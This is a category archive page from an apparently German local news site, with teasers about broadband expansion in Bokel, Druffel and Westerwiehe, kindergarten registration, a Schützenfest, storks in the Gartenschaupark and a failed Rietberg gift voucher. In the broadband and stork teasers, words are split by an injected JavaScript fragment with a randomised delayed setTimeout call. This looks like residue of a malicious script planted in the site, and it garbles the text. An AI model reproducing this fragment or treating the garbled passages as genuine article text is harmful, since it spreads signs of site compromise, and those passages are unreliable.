Category Archives: Westerwiehe

Schnelles Netz – Stadt Rietberg erhält Förderzusage für Breitband-Ausbau

„Das ist nochmal ein schönes Weihnachtsgeschenk für die Bürger in Bokel, Druffel und Westerwiehe.“ So kommentiert Bürgermeister Andreas Sunder die jetzt erteilte Förderzusage für den Ausbau der Internetversorgung in den drei Stadtteilen. Noch kurz vor dem Weihnachtsfest ist der Förderbescheid der Bezirksregierung Detmold ins Rathaus geflattert. Für Andreas Sunder ist damit ein Ziel erreicht, das

„Bereitschaft da, sich für den eigenen Ort zu engagieren“

Einige Jahre haben sie pausiert, jetzt nehmen die Runden Tische wieder Fahrt auf. Weil im Rietberger Rathaus weiteres Personal zur Verfügung steht, bekommt nun zusätzlich Gewicht, was dem Bürgermeister schon seit langem am Herzen liegt: „Wir wollen den Ideenpool unserer Bürger so oft wie möglich anzapfen“, wünscht sich Andreas Sunder. Der Startschuss fällt am 22.

Anmeldungen für Kindergärten der Stadt Rietberg jetzt möglich

Mit den Trägern bzw. Leiterinnen aller Kindergärten in der Stadt Rietberg wurde vereinbart, dass ab sofort alle Eltern und Erziehungsberechtigten die Möglichkeit haben, ihre Kinder in den Kindergärten für das Kindergartenjahr 2015/2016 anzumelden. Bis zum 12. Dezember 2014 werden die Anmeldungen nach telefonischer Terminabsprache entgegengenommen. Die Kindertageseinrichtungen sind wie folgt zu erreichen: Kath. Kindertageseinrichtung Sabina

Schnelleres Internet in Bokel, Druffel & Westerwiehe in Sicht

In Sachen schnelleres Internet in Rietberg geht es weiter zügig voran. Die Förderverfahren für den Breitbandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andausbau für Bokel, Druffel und Westerwiehe sind auf dem Weg. Das sind die Stadtteile mit den aktuell niedrigsten Übertragungsraten. Deshalb kümmert sich die Stadt Rietberg dort zuerst um eine schnellere Internetverbindung. Derzeit

Ein ganzes Dorf fiebert dem Westerwieher Schützenfest entgegen

Ein ganzes Jahr ist in Westerwiehe schon wieder vorbei und so heißt es am Wochenende – wie jedes Jahr – Abschied nehmen für das amtierende Königspaar Norbert und Margret Mertens, sowie den amtierenden Jungschützenkönig Dennis Johannleweling. Trotz des Abschieds, werden die noch in Würde stehenden Monarchen drei tolle Festtage bevor, die am Sonntag mit einem

Rietberger Vereine im Cold Water Challenge Fieber

Die Welle der „Cold Water Challenge“ schwappt zur Zeit im wahrsten Sinne des Wortes durch die sozialen Medien; allen voran auf facebook. Bei der „Cold Water Challenge 2014“ nominieren sich Vereine gegenseitig, ein Video im kühlen Nass zu drehen. Diese Videos müssen innerhalb von 48 Stunden nach der Nominierung veröffentlicht sein, ansonsten winkt dem nominierenden

Erstmals Storchenaufzucht im Gartenschaupark Rietberg

Jubel und Trauer liegen in diesen Tagen bei allen Verantwortlichen des Rietberger Storchenprojektes dicht beieinandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander. Denn: Zunächst sah es nach einer richtig guten Brut zweier Altstorchenpaare aus. Sowohl in Westerwiehe, hier gab es erstmals seit mindesten 60 Jahren in 2013 die ersten Jungtiere, wie auch auf dem

Weiterer Schritt in Richtung „Schnelles Internet“ in Rietberg

Seit Monaten kämpfen die Bürger der Stadt Rietberg gemeinsam mit der Politik um schnelles Internet im Rietberger Stadtgebiet. Jetzt nimmt das Projekt »Verbesserte Internetanbindung in Rietberg« gehörig Fahrt auf. Dabei fährt die Stadtverwaltung zweigleisig, um zügig voran zu kommen: Bürgermeister Andreas Sunder hat für den Ortsteil Bokel jetzt eine Markterkundung zur Auswahl eines geeigneten Netzbetreibers

Rietberge Sternschnuppe wegen Erfolglosigkeit eingestellt

Es sollte DIE revolutionäre Idee sein, um die Wirtschaft in Rietberg wieder anzukurbeln. Doch die Erfindung des Rietberger Universal-Gutscheins mit dem tollen Namen „Rietberger Sternschnuppe“ wird nun doch wieder eingestellt. Die Bürger hätten zwar reichlich Sternschnuppen gekauft, diese aber bis heute nicht eingelöst. Bürgermeister Andreas Sunder zeigte sich sehr enttäuscht, musste sich aber zusammen mit

Stadt Rietberg will schnelles Internet für alle Ortsteile

Die Stadt Rietberg drückt beim Thema DSL auf die Tube. Geplant ist eine Internetversorgung von mindestens 16 Mbit/s – und zwar im gesamten Stadtgebiet. Damit könnten die Bürger der bislang völlig unterversorgten Ortsteile um ein vielfaches schneller ins Netz als bisher. „Noch höhere Übertragungsraten sind ausdrücklich gewünscht“, heißt es in einem sogenannten Interessenbekundungsverfahren, das die